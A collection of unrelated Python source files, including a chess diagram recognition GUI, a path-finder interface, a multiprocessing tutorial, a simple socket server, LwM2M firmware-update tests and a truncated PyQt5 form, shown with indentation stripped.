Image.open(get_absolute_path("../resources/pieces/bQ.png", __file__)).resize((70, 70))
),
2: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/bR.png", __file__)).resize((70, 70))
),
10: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wB.png", __file__)).resize((70, 70))
),
12: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wK.png", __file__)).resize((70, 70))
),
9: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wN.png", __file__)).resize((70, 70))
),
7: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wP.png", __file__)).resize((70, 70))
),
11: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wQ.png", __file__)).resize((70, 70))
),
8: ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/pieces/wR.png", __file__)).resize((70, 70))
),
}
################################################################################
################################################################################
class ProcessImage:
def __init__(self, a_queue):
self.a_queue = a_queue
self.black_model = keras.models.load_model(
get_absolute_path("../resources/black_model.h5", __file__)
)
self.white_model = keras.models.load_model(
get_absolute_path("../resources/white_model.h5", __file__)
)
def process(self, np_image):
np_diagram = get_diagram_position(np_image)
# is a diagram large enough
if np_diagram.shape[0] * 5 < np_image.shape[0] or np_diagram.shape[1] * 5 < np_image.shape[1]:
print("No diagram")
return None
result = []
black_squares, white_squares = get_squares(np_diagram)
for image, i, j in black_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.black_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
for image, i, j in white_squares:
image_gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
square = cv.resize(image_gray, (32, 32)) / 255.0
y_prob = self.white_model.predict(square.reshape(1, 32, 32, 1))
y_classes = y_prob.argmax(axis=-1)
if y_classes[0] != 0:
result.append((i, j, y_classes[0]))
self.a_queue.put_nowait(result)
################################################################################
################################################################################
class ChessBoard(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.canvas = tk.Canvas(self, width=560, height=560)
self.canvas.place(x=20, y=20)
self.board_image = ImageTk.PhotoImage(
Image.open(get_absolute_path("../resources/board.jpg", __file__)).resize((560, 560))
)
self.canvas.create_image(0, 0, image=self.board_image, anchor=tk.NW)
self.pieces = load_pieces()
self.showed_pieces = []
def clear_board(self):
for piece_ref in self.showed_pieces:
self.canvas.delete(piece_ref)
self.showed_pieces = []
def set_piece(self, i, j, piece_id):
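# the 560 px board holds 8 x 8 squares of 70 px, so i and j select the
# square counted from the top-left corner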
piece_ref = self.canvas.create_image(i * 70, j * 70, image=self.pieces[piece_id], anchor=tk.NW)
self.showed_pieces.append(piece_ref)
################################################################################
################################################################################
class LeftSide(tk.Frame):
def __init__(self, root, chess_board, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.camera_button = tk.Button(self, text="Open camera", command=self.show_frame)
self.camera_button.place(x=50, y=20)
self.browse_button = tk.Button(self, text="Browse file", command=self.show_image)
self.browse_button.place(x=200, y=20)
self.image_on_canvas = None
self.canvas = tk.Canvas(self, width=450, height=450)
self.canvas.place(x=50, y=100)
self.cv_video_capture = None
self.video_camera_on = False
self.chess_board = chess_board
self.a_queue = queue.Queue()
self.process_image = ProcessImage(self.a_queue)
self.thread = None
def show_frame(self):
self.video_camera_on = True
self.show_video_frame()
def show_video_frame(self, counter=1):
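# Grab a frame roughly every 20 ms; the first call starts recognition in a
# background thread, later calls only redraw the board once a finished result
# is waiting in the queue and then kick off the next recognition pass.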
if not self.video_camera_on:
return
if not self.cv_video_capture:
self.cv_video_capture = cv.VideoCapture(0)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_WIDTH, 450)
self.cv_video_capture.set(cv.CAP_PROP_FRAME_HEIGHT, 450)
_, frame = self.cv_video_capture.read()
# frame = cv.flip(frame, 1)
cv2image = cv.cvtColor(frame, cv.COLOR_BGR2RGBA)
if counter == 1:
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
elif not self.a_queue.empty():
self.show_pieces(self.a_queue.get(0))
self.thread = threading.Thread(target=self.process_image.process, args=(cv2image[..., :3],))
self.thread.start()
image = Image.fromarray(cv2image)
image_tk = ImageTk.PhotoImage(image=image)
self.canvas.delete(tk.ALL)
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
if self.cv_video_capture:
self.canvas.after(20, self.show_video_frame, counter + 1)
def show_image(self):
self.video_camera_on = False
if self.cv_video_capture:
self.cv_video_capture = self.cv_video_capture.release()
self.canvas.delete(tk.ALL)
from tkinter import filedialog
file_path = filedialog.askopenfilename(title="Select file")
if file_path:
try:
image = Image.open(file_path)
self.process_image.process(np.array(image)[..., :3])
# process() only queues a result when a diagram is detected,
# so check before reading to avoid blocking on an empty queue
if not self.a_queue.empty():
self.show_pieces(self.a_queue.get_nowait())
image_tk = ImageTk.PhotoImage(image.resize((450, 450)))
self.canvas.image_tk = image_tk
self.canvas.create_image(0, 0, image=image_tk, anchor=tk.NW)
except UnidentifiedImageError:
pass
def show_pieces(self, pieces):
self.chess_board.clear_board()
for i, j, piece_id in pieces:
self.chess_board.set_piece(i, j, piece_id)
################################################################################
################################################################################
class Application(tk.Frame):
def __init__(self, root, *args, **kwargs):
tk.Frame.__init__(self, root, *args, **kwargs)
self.root = root
self.root.title("Chess Diagram Recognition")
self.chess_board = ChessBoard(self.root, height=600, width=600)
self.chess_board.place(x=600, y=0)
self.left_side = LeftSide(
self.root,
self.chess_board,
height=600,
width=600
)
self.left_side.place(x=0, y=0)
################################################################################
################################################################################
def main():
root = tk.Tk()
root.bind("<Escape>", lambda e: root.quit())
Application(root)
root.minsize(height=600, width=1200)
root.maxsize(height=600, width=1200)
root.mainloop()
################################################################################
################################################################################
main()
|
localPathFinderInterface.py
|
import errno
import os
from threading import Thread
import time
from engine.interface import fileUtils
from engine.pathFinder import PathFinder
from engine.pathFinderManager import PathFinderManager
import gui
from gui.pathFinder.pathFinderInterface import PathFinderInterface
MAX_FILE_DUMPS = 1000
class LocalPathFinderInterface(PathFinderInterface):
"""
Manages a local path finder for use in PathFindViewer.
"""
def __init__(self, dumpScenarios=False):
PathFinderInterface.__init__(self)
self._pathFinderManager = PathFinderManager()
self._pathFinderManager.setListeners(self._fireInputAccepted, self._fireStepPerformed)
self._solving = False
self._solveID = 0
self._dumpScenarios = dumpScenarios
def submitProblem(self, params, scenario, vehicle):
if self._solving:
print "Cannot submit problem while other operations are in progress!"
return
self._pathFinderManager.submitProblem(params, scenario, vehicle)
def stepProblem(self, numSteps=1):
if self._solving:
print "Cannot step problem while other operations are in progress!"
return
self._pathFinderManager.stepProblem(numSteps)
def solveProblem(self, params, scenario, vehicle, timeout):
startTime = time.time()
if self._pathFinderManager.getStepsRemaining() > 0 or self._solving:
print "Cannot start a solve operation while other operations are in progress!"
return
self._solving = True
if self._dumpScenarios:
self._solveID += 1
solveID = self._solveID % MAX_FILE_DUMPS
dumpDirectory = os.path.join(os.path.expanduser("~"), "pathDumps")
if not os.path.exists(dumpDirectory):
try:
os.makedirs(dumpDirectory)
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
path = os.path.join(dumpDirectory, "dump" + str(solveID) + ".json")
print "Solving problem ID = " + str(solveID) + ". Problem stored in: " + path
fileUtils.save(path, params, scenario, vehicle)
Thread(target=self._solve, args=[params, scenario, vehicle, startTime, timeout]).start()
def _solve(self, params, scenario, vehicle, startTime, timeout):
self._fireInputAccepted(params, scenario, vehicle)
pathFinder = PathFinder(params, scenario, vehicle)
totalTime = 0.0
numSteps = 0
# Timeout occurs when total_time + avg_time_per_step > timeout
while pathFinder.step():
totalTime = time.time() - startTime
numSteps += 1
if (totalTime * (numSteps + 1)) / numSteps > timeout:
break
bestPath = pathFinder.getBestPath()
pathFinder.destroy()
self._solving = False
self._fireSolved(bestPath)
|
MutiProcessProgramming.py
|
print('MultiProcessProgramming')
# Unix multi-process creation with fork
#
# import os
#
# print('Process (%s) start...' % os.getpid())
#
# pid = os.fork()
#
# if pid == 0:
# print('I am child process(%s) and parent is %s' % (os.getpid(),os.getppid()))
# else:
# print('I (%s) just created a child process (%s)' % (os.getpid(), pid))
#
# # multiprocessing: usable on Windows, the cross-platform approach
#
# from multiprocessing import Process
# import os
#
# # Code to be executed in the child process
#
# def run_proc(name):
# print('Run child process %s (%s)...' % (name, os.getpid()))
#
# if __name__ == '__main__':
# print('Parent process %s.' % os.getpid())
# p = Process(target=run_proc, args=('test',))
# p.start();
# p.join();
# print('Child process end.')
# Pool: a process pool for launching many child processes
from multiprocessing import Pool
import os, time, random
def long_time_task(name):
print('Run task %s (%s) ...' % (name, os.getpid()))
start = time.time()
time.sleep(random.random() * 3)
end = time.time()
print('task %s runs %.02f seconds .' % (name, (end - start)))
if __name__ == '__main__':
print('Parent process %s.' % os.getpid())
p = Pool(4)
for i in range(5):
p.apply_async(long_time_task, args=(i,))
print('Waiting for all sub process done...')
p.close()
p.join()
print('All sub process done.')
# Child processes
# Inter-process communication
# Multithreading
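# The notes above mention inter-process communication without showing it; a
# minimal sketch using a multiprocessing.Queue (illustrative only, kept
# commented out like the other examples in this file) could look like:
#
# from multiprocessing import Process, Queue
#
# def producer(q):
#     for i in range(5):
#         q.put(i)        # hand data to the consumer process
#     q.put(None)         # sentinel: tell the consumer to stop
#
# def consumer(q):
#     while True:
#         item = q.get()  # blocks until the producer sends something
#         if item is None:
#             break
#         print('consumed', item)
#
# if __name__ == '__main__':
#     q = Queue()
#     p1 = Process(target=producer, args=(q,))
#     p2 = Process(target=consumer, args=(q,))
#     p1.start(); p2.start()
#     p1.join(); p2.join()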
|
FS1Server.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# (wg-python-fix-pdbrc)
### HEREHEREHERE
from __future__ import annotations
import os
import optparse
import sys
import re
import socket
import threading
#############################################################################
# git FlexSpec1/Code/FlexSpec/ClientServer/FS1Server.py
#
#
#emacs helpers
# (insert (format "\n# %s " (buffer-file-name)))
#
#
# (set-input-method 'TeX' t)
# (toggle-input-method)
#
# (wg-astroconda3-pdb) # CONDA Python3
#
# (wg-python-fix-pdbrc) # PDB DASH DEBUG end-comments
#
# (ediff-current-file)
# (find-file-other-frame "./.pdbrc")
# (setq mypdbcmd (concat (buffer-file-name) "<args...>"))
# (progn (wg-python-fix-pdbrc) (pdb mypdbcmd))
#
# (wg-astroconda-pdb) # IRAF27
#
# (set-background-color "light blue")
#
# (wg-python-toc)
#
#############################################################################
__doc__ = """
clientserver/FS1Server.py
[options] files...
The FS1Server is a class that listens on a port on 'this' machine
(it's a server) for messages of fixed-length utf-8 characters.
If it sees the message starting with disconnect_msg it will stop
the loop and hangup.
https://stackoverflow.com/questions/6380057/python-binding-socket-address-already-in-use
"""
__author__ = 'Wayne Green'
__version__ = '0.1'
# from FS1Server import FS1Server, FS1ServerException
__all__ = ['FS1Server','FS1ServerException']
##############################################################################
# FS1ServerException
#
##############################################################################
class FS1ServerException(Exception):
"""Special exception to allow differentiated capture of exceptions"""
def __init__(self,message,errors=None):
super(FS1ServerException,self).__init__("FS1Server "+ message)
self.errors = errors
@staticmethod
def __format__(e):
return f" FS1Server: {e.__str__()}\n"
# FS1ServerException
##############################################################################
# FS1Server
#
##############################################################################
class FS1Server(object):
""" Make a server side for FS1Server.
"""
#__slots__ = [''] # add legal instance variables
# (setq properties `("" ""))
DEFAULT_MESSAGESIZE = 256 # a message is always 64 bytes, this example
DEFAULT_SERVER = socket.gethostbyname(socket.gethostname())
DEFAULT_PORT = 45654 # my cute port address
ADDR = (DEFAULT_SERVER, DEFAULT_PORT) # use a tuple
FORMAT = 'utf-8' # basic ASCII like strings
DEFAULT_DISCONNECT = "!DISCONNECT!" # signal server to close
def __init__(self, port : int = None, # FS1Server::__init__()
msgsize : int = None,
disconnect_msg : str = None,
serverip : str = None, # '127.0.0.1',
ostream : _io.TextIOWrapper = sys.stdout
):
"""Defaults to localhost, and to port 45654"""
self.PORT = port or FS1Server.DEFAULT_PORT
self.SERVER = serverip or FS1Server.DEFAULT_SERVER
self.MESSAGESIZE = msgsize or FS1Server.DEFAULT_MESSAGESIZE
self.DISCONNECT_MESSAGE = disconnect_msg or FS1Server.DEFAULT_DISCONNECT
self.FORMAT = 'utf-8' # force this
self._ADDR = (self.SERVER, self.PORT) # use a tuple
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind(self._ADDR) # bind these two using the tuple
self.ostream = ostream # place for print to dump things.
### FS1Server.__init__()
def debug(self, msg="", skip=[], os=sys.stderr): # FS1Server::debug()
"""Help with momentary debugging, file to fit.
msg -- special tag for this call
skip -- the member variables to ignore
os -- output stream: may be IOStream etc.
"""
import pprint
print("FS1Server - %s " % msg, file=os)
for key,value in self.__dict__.items():
if(key in skip):
continue
print(f'{key:20s} =', file=os, end='')
pprint.pprint(value,stream=os,indent=4)
return self
### FS1Server.debug()
__FS1Server_debug = debug # really preserve our debug name if we're inherited
def handle_client(self, conn, addr):
"""Runs on a separate thread: handle a single connection (started from
start() below). Messages are two exchanges: first the space-padded
"length" header, then the payload itself.
client -> str(len(payload)) + b' ' * (MESSAGESIZE - header length)
client -> payload
"""
print(f"[NEW CONNECTION] {addr} connected.",file=self.ostream)
connected = True
while connected:
msg_length = conn.recv(self.MESSAGESIZE).decode(self.FORMAT)
if msg_length: # the first message has a None so skip that one
msg_length = int(msg_length) # blocks
msg = conn.recv(msg_length).decode(self.FORMAT) # blocks
if msg == self.DISCONNECT_MESSAGE:
connected = False
if(1): print(f"[{addr}] {msg}")
conn.send("Msg received".encode(self.FORMAT)) # reply something to client.
conn.close() # close the current connection, exit this thread,
# handle_client
def start(self):
"""Allow the socket to start listening for connections.
This winds up being a thread."""
self.server.listen()
if(1): print(f"[LISTENING] Server is listening on {self.SERVER}",file=sys.stderr)
while True:
conn, addr = self.server.accept() # server.accept 'blocks' until the connection
print("conn ",conn)
thread = threading.Thread(target=self.handle_client, args=(conn, addr))
thread.start()
if(1): print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}",file=sys.stderr)
# start
def write(self,msg):
"""Pass along msg to subclass"""
pass
def read(self,character):
"""Get a message from sub-class. Follow some protocol."""
raise FS1ServerException("FS1Server::read Unimplemented.")
#pass
# class FS1Server
##############################################################################
# Main
# Regression Tests
##############################################################################
# HEREHEREHERE
if __name__ == "__main__":
opts = optparse.OptionParser(usage="%prog "+__doc__)
opts.add_option("-v", "--verbose", action="store_true", dest="verboseflag",
default=False,
help="<bool> be verbose about work.")
(options, args) = opts.parse_args()
print("hello") # PDB-DEBUG
testserver = FS1Server()
print("[STARTING] server is starting...")
testserver.debug()
testserver.start()
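# Minimal client sketch (illustrative only, not part of the original file):
# the header is the payload length padded with spaces to MESSAGESIZE bytes,
# followed by the payload itself, as expected by handle_client() above.
#
# import socket
# client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# client.connect((FS1Server.DEFAULT_SERVER, FS1Server.DEFAULT_PORT))
# payload = "Hello FlexSpec".encode('utf-8')
# header = str(len(payload)).encode('utf-8')
# header += b' ' * (FS1Server.DEFAULT_MESSAGESIZE - len(header))
# client.send(header)
# client.send(payload)
# print(client.recv(2048).decode('utf-8'))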
|
firmware_update.py
|
# Copyright 2020 AVSystem <avsystem@avsystem.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import http
import os
import ssl
import sys
import tempfile
import threading
import time
import jni_test
from framework.lwm2m.messages import *
from framework.test_utils import *
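# State (/5/0/3) and Update Result (/5/0/5) values defined by the LwM2M
# Firmware Update object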
UPDATE_STATE_IDLE = 0
UPDATE_STATE_DOWNLOADING = 1
UPDATE_STATE_DOWNLOADED = 2
UPDATE_STATE_UPDATING = 3
UPDATE_RESULT_INITIAL = 0
UPDATE_RESULT_SUCCESS = 1
UPDATE_RESULT_NOT_ENOUGH_SPACE = 2
UPDATE_RESULT_OUT_OF_MEMORY = 3
UPDATE_RESULT_CONNECTION_LOST = 4
UPDATE_RESULT_INTEGRITY_FAILURE = 5
UPDATE_RESULT_UNSUPPORTED_PACKAGE_TYPE = 6
UPDATE_RESULT_INVALID_URI = 7
UPDATE_RESULT_FAILED = 8
UPDATE_RESULT_UNSUPPORTED_PROTOCOL = 9
FIRMWARE_PATH = '/firmware'
class FirmwareUpdate:
class Test(jni_test.LocalSingleServerTest):
def set_expect_send_after_state_machine_reset(self, expect_send_after_state_machine_reset):
self.expect_send_after_state_machine_reset = expect_send_after_state_machine_reset
def setUp(self, garbage=0, *args, **kwargs):
garbage_lines = ''
while garbage > 0:
garbage_line = '#' * (min(garbage, 80) - 1) + '\n'
garbage_lines += garbage_line
garbage -= len(garbage_line)
self.FIRMWARE_SCRIPT_CONTENT = garbage_lines.encode('ascii')
super().setUp(*args, **kwargs)
def tearDown(self):
try:
super().tearDown()
finally:
try:
os.unlink('downloaded_firmware')
except FileNotFoundError:
pass
def read_update_result(self):
req = Lwm2mRead(ResPath.FirmwareUpdate.UpdateResult)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(), res)
return int(res.content)
def read_state(self):
req = Lwm2mRead(ResPath.FirmwareUpdate.State)
self.serv.send(req)
res = self.serv.recv()
self.assertMsgEqual(Lwm2mContent.matching(req)(), res)
return int(res.content)
def write_firmware_and_wait_for_download(self, firmware_uri: str,
download_timeout_s=20):
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI, firmware_uri)
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
# wait until client downloads the firmware
deadline = time.time() + download_timeout_s
while time.time() < deadline:
time.sleep(0.5)
if self.read_state() == UPDATE_STATE_DOWNLOADED:
return
self.fail('firmware still not downloaded')
class TestWithHttpServer(Test):
RESPONSE_DELAY = 0
CHUNK_SIZE = sys.maxsize
ETAGS = False
def get_firmware_uri(self):
return 'http://127.0.0.1:%d%s' % (self.http_server.server_address[1], FIRMWARE_PATH)
def provide_response(self, use_real_app=False):
with self._response_cv:
self.assertIsNone(self._response_content)
if use_real_app:
with open(os.path.join(self.config.demo_path, self.config.demo_cmd), 'rb') as f:
firmware = f.read()
self._response_content = make_firmware_package(
firmware)
else:
self._response_content = make_firmware_package(
self.FIRMWARE_SCRIPT_CONTENT)
self._response_cv.notify()
def _create_server(self):
test_case = self
class FirmwareRequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(http.HTTPStatus.OK)
self.send_header('Content-type', 'text/plain')
if test_case.ETAGS:
self.send_header('ETag', '"some_etag"')
self.end_headers()
# This condition variable makes it possible to defer sending the response.
# FirmwareUpdateStateChangeTest uses it to ensure demo has enough time
# to send the interim "Downloading" state notification.
with test_case._response_cv:
while test_case._response_content is None:
test_case._response_cv.wait()
response_content = test_case._response_content
test_case.requests.append(self.path)
test_case._response_content = None
def chunks(data):
for i in range(0, len(response_content), test_case.CHUNK_SIZE):
yield response_content[i:i + test_case.CHUNK_SIZE]
for chunk in chunks(response_content):
time.sleep(test_case.RESPONSE_DELAY)
self.wfile.write(chunk)
self.wfile.flush()
def log_request(self, code='-', size='-'):
# don't display logs on successful request
pass
return http.server.HTTPServer(('', 0), FirmwareRequestHandler)
def write_firmware_and_wait_for_download(self, *args, **kwargs):
requests = list(self.requests)
super().write_firmware_and_wait_for_download(*args, **kwargs)
self.assertEqual(requests + ['/firmware'], self.requests)
def setUp(self, *args, **kwargs):
self.requests = []
self._response_content = None
self._response_cv = threading.Condition()
self.http_server = self._create_server()
super().setUp(*args, **kwargs)
self.server_thread = threading.Thread(
target=lambda: self.http_server.serve_forever())
self.server_thread.start()
def tearDown(self):
try:
super().tearDown()
finally:
self.http_server.shutdown()
self.server_thread.join()
class TestWithTlsServer(Test):
@staticmethod
def _generate_pem_cert_and_key(cn='127.0.0.1', alt_ip='127.0.0.1'):
import datetime
import ipaddress
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
key = rsa.generate_private_key(public_exponent=65537, key_size=2048,
backend=default_backend())
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])
now = datetime.datetime.utcnow()
cert_builder = (x509.CertificateBuilder().
subject_name(name).
issuer_name(name).
public_key(key.public_key()).
serial_number(1000).
not_valid_before(now).
not_valid_after(now + datetime.timedelta(days=1)))
if alt_ip is not None:
cert_builder = cert_builder.add_extension(x509.SubjectAlternativeName(
[x509.DNSName(cn), x509.IPAddress(ipaddress.IPv4Address(alt_ip))]),
critical=False)
cert = cert_builder.sign(key, hashes.SHA256(), default_backend())
cert_pem = cert.public_bytes(encoding=serialization.Encoding.PEM)
key_pem = key.private_bytes(encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption())
return cert_pem, key_pem
def setUp(self, pass_cert_to_demo=True):
cert_pem, key_pem = self._generate_pem_cert_and_key()
with tempfile.NamedTemporaryFile(delete=False) as cert_file, \
tempfile.NamedTemporaryFile(delete=False) as key_file:
cert_file.write(cert_pem)
cert_file.flush()
key_file.write(key_pem)
key_file.flush()
self._cert_file = cert_file.name
self._key_file = key_file.name
extra_cmdline_args = []
if pass_cert_to_demo:
extra_cmdline_args += ['--fw-cert-file', self._cert_file]
super().setUp(extra_cmdline_args=extra_cmdline_args)
def tearDown(self):
def unlink_without_err(fname):
try:
os.unlink(fname)
except:
print('unlink(%r) failed' % (fname,))
sys.excepthook(*sys.exc_info())
try:
super().tearDown()
finally:
unlink_without_err(self._cert_file)
unlink_without_err(self._key_file)
class TestWithHttpsServer(TestWithTlsServer, TestWithHttpServer):
def get_firmware_uri(self):
http_uri = super().get_firmware_uri()
assert http_uri[:5] == 'http:'
return 'https:' + http_uri[5:]
def _create_server(self):
http_server = super()._create_server()
http_server.socket = ssl.wrap_socket(http_server.socket, certfile=self._cert_file,
keyfile=self._key_file,
server_side=True)
return http_server
class FirmwareUpdateHttpsTest(FirmwareUpdate.TestWithHttpsServer):
def runTest(self):
self.provide_response()
self.write_firmware_and_wait_for_download(
self.get_firmware_uri(), download_timeout_s=20)
# Execute /5/0/2 (Update)
req = Lwm2mExecute(ResPath.FirmwareUpdate.Update)
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
class FirmwareUpdateUnconfiguredHttpsTest(FirmwareUpdate.TestWithHttpsServer):
def setUp(self):
super().setUp(pass_cert_to_demo=False)
def runTest(self):
# disable minimum notification period
write_attrs_req = Lwm2mWriteAttributes(ResPath.FirmwareUpdate.UpdateResult,
query=['pmin=0'])
self.serv.send(write_attrs_req)
self.assertMsgEqual(Lwm2mChanged.matching(
write_attrs_req)(), self.serv.recv())
# initial result should be 0
observe_req = Lwm2mObserve(ResPath.FirmwareUpdate.UpdateResult)
self.serv.send(observe_req)
self.assertMsgEqual(Lwm2mContent.matching(
observe_req)(content=b'0'), self.serv.recv())
# Write /5/0/1 (Firmware URI)
req = Lwm2mWrite(ResPath.FirmwareUpdate.PackageURI,
self.get_firmware_uri())
self.serv.send(req)
self.assertMsgEqual(Lwm2mChanged.matching(req)(),
self.serv.recv())
# even before reaching the server, we should get an error
notify_msg = self.serv.recv()
# no security information => "Unsupported protocol"
self.assertMsgEqual(Lwm2mNotify(observe_req.token,
str(UPDATE_RESULT_UNSUPPORTED_PROTOCOL).encode()),
notify_msg)
self.serv.send(Lwm2mReset(msg_id=notify_msg.msg_id))
self.assertEqual(0, self.read_state())
|
application.py
|
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton
from PyQt5.QtCore import QPoint
import sys
import setupsys
import systimatic
from ub import TW
import time
import threading
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(586, 711)
font = QtGui.QFont()
font.setFamily("MS Serif")
font.setPointSize(16)
Form.setFont(font)
Form.setLayoutDirection(QtCore.Qt.RightToLeft)
self.setWindowIcon(QtGui.QIcon('inapp.ico'))
Form.setStyleSheet("background: rgb(0, 0, 0);")
self.browsebox = QtWidgets.QLineEdit(Form)
self.browsebox.setGeometry(QtCore.QRect(30, 190, 441, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.browsebox.setFont(font)
self.browsebox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.browsebox.setInputMask("")
self.browsebox.setText("")
self.browsebox.setObjectName("browsebox")
self.browsebtn = QtWidgets.QPushButton(Form)
self.browsebtn.setGeometry(QtCore.QRect(480, 190, 93, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.browsebtn.setFont(font)
self.browsebtn.setStyleSheet("QPushButton#browsebtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:4px;\n"
"}\n"
"QPushButton#browsebtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
"QPushButton#browsebtn{\n"
"background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"}")
self.browsebtn.setObjectName("browsebtn")
self.userbox = QtWidgets.QLineEdit(Form)
self.userbox.setGeometry(QtCore.QRect(30, 61, 191, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.userbox.setFont(font)
self.userbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.userbox.setInputMask("")
self.userbox.setMaxLength(32766)
self.userbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.userbox.setObjectName("userbox")
self.passwordbox = QtWidgets.QLineEdit(Form)
self.passwordbox.setGeometry(QtCore.QRect(30, 110, 191, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.passwordbox.setFont(font)
self.passwordbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.passwordbox.setEchoMode(QtWidgets.QLineEdit.Password)
self.passwordbox.setObjectName("passwordbox")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setEnabled(True)
self.textBrowser.setGeometry(QtCore.QRect(20, 400, 551, 231))
font = QtGui.QFont()
font.setFamily("Diwani Simple Striped")
font.setPointSize(11)
self.textBrowser.setFont(font)
self.textBrowser.setStyleSheet("color: #ffffff;")
self.textBrowser.setObjectName("textBrowser")
self.versionbox = QtWidgets.QLineEdit(Form)
self.versionbox.setGeometry(QtCore.QRect(60, 260, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.versionbox.setFont(font)
self.versionbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.versionbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.versionbox.setObjectName("versionbox")
self.builbox = QtWidgets.QLineEdit(Form)
self.builbox.setGeometry(QtCore.QRect(240, 310, 111, 21))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.builbox.setFont(font)
self.builbox.setStyleSheet("background-color:rgba(44, 40, 129, 0.8);\n"
"border:1px solid rgba(0,0,0,0);\n"
"color:rgba(255,255,255,0.5);\n"
"border-radius: 5px;\n"
"font-family: Courier New;\n"
"font-size: 20px;")
self.builbox.setText("")
self.builbox.setEchoMode(QtWidgets.QLineEdit.Normal)
self.builbox.setObjectName("builbox")
self.buildbtn = QtWidgets.QPushButton(Form)
self.buildbtn.setGeometry(QtCore.QRect(30, 350, 251, 31))
font = QtGui.QFont()
font.setFamily("Courier New")
font.setPointSize(-1)
self.buildbtn.setFont(font)
self.buildbtn.setStyleSheet("QPushButton#buildbtn{\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"font-family: Courier New;\n"
"font-size: 20px;\n"
"border-radius:6px;\n"
"}\n"
"QPushButton#buildbtn:pressed{\n"
"padding-left:5px;\n"
"padding-top:5px;\n"
"background-color:rgba(242, 255, 0, 0.74);\n"
"color:rgba(0, 0, 0, 1);\n"
"background-position:calc(100% - 10px)center;\n"
"}\n"
